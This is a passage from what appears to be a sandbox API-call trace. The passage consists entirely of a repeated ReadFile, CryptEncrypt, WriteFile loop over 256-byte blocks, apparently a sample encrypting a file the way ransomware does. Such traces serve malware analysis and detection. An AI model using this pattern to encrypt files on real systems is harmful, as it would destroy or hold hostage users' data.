lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.992] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.992] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.992] GetLastError () returned 0x0 [0144.992] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.992] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.992] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.992] GetLastError () returned 0x0 [0144.992] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.992] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.993] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.993] GetLastError () returned 0x0 [0144.993] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.993] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.993] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.993] GetLastError () returned 0x0 [0144.993] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.993] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.993] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.993] GetLastError () returned 0x0 [0144.993] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.993] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.993] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.993] GetLastError () returned 0x0 [0144.993] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.994] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.994] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.994] GetLastError () returned 0x0 [0144.994] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.994] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.994] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.994] GetLastError () returned 0x0 [0144.994] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.994] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.994] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.994] GetLastError () returned 0x0 [0144.994] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.994] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.994] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.994] GetLastError () returned 0x0 [0144.994] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.994] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.994] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.994] GetLastError () returned 0x0 [0144.994] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.995] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.995] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.995] GetLastError () returned 0x0 [0144.995] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.995] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.995] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.995] GetLastError () returned 0x0 [0144.995] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.995] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.996] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.996] GetLastError () returned 0x0 [0144.996] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.996] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.996] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.996] GetLastError () returned 0x0 [0144.996] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.996] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.996] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.996] GetLastError () returned 0x0 [0144.996] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.996] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.997] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.997] GetLastError () returned 0x0 [0144.997] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.997] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.997] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.997] GetLastError () returned 0x0 [0144.997] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.997] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.997] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.997] GetLastError () returned 0x0 [0144.997] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.997] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.997] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.997] GetLastError () returned 0x0 [0144.997] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.997] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.997] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.997] GetLastError () returned 0x0 [0144.997] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.997] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.998] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.998] GetLastError () returned 0x0 [0144.998] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.998] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.998] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.998] GetLastError () returned 0x0 [0144.998] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.998] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.998] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.998] GetLastError () returned 0x0 [0144.998] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.998] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.998] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.998] GetLastError () returned 0x0 [0144.998] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.998] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.998] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.998] GetLastError () returned 0x0 [0144.998] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.998] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.999] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.999] GetLastError () returned 0x0 [0144.999] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.999] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.999] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.999] GetLastError () returned 0x0 [0144.999] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.999] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.999] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.999] GetLastError () returned 0x0 [0144.999] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.999] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.999] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.999] GetLastError () returned 0x0 [0144.999] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.999] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.999] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.999] GetLastError () returned 0x0 [0144.999] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.000] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.000] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.000] GetLastError () returned 0x0 [0145.000] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.229] PathFileExistsW 